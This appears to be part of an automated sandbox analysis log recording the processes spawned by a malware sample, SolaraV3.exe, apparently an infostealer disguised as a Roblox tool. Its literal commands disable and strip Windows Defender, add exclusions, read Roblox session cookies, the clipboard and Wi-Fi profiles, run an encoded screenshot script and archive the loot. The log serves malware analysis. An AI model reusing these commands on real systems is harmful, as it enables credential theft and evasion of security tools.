              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\Desktop\SolaraV3.exe""
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\SolaraV3.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr'
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.cmdline"
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESF203.tmp" "c:\Users\user\AppData\Local\Temp\se3yji4z\CSC9CC35FFA2F54059AD6E143F6E3C2E84.TMP"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user~1\AppData\Local\Temp\_MEI28842\rar.exe a -r -hp"qwerty123" "C:\Users\user~1\AppData\Local\Temp\w0e8R.zip" *"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe C:\Users\user~1\AppData\Local\Temp\_MEI28842\rar.exe a -r -hp"qwerty123" "C:\Users\user~1\AppData\Local\Temp\w0e8R.zip" *
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\reg.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Users\user\Desktop\SolaraV3.exe "C:\Users\user\Desktop\SolaraV3.exe"Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV3.exe'"Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('?????? ?????? ???? ????????. ?????? ??? ?????????? ????? ?????? ? ?????? ?????!', 0, 'Error!', 32+16);close()""Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\Desktop\SolaraV3.exe""Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\??? .scr'"Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\SolaraV3.exe"Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\Desktop\SolaraV3.exe""Jump to behavior
              Source: C:\Users\user\Desktop\SolaraV3.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"Jump to behavior
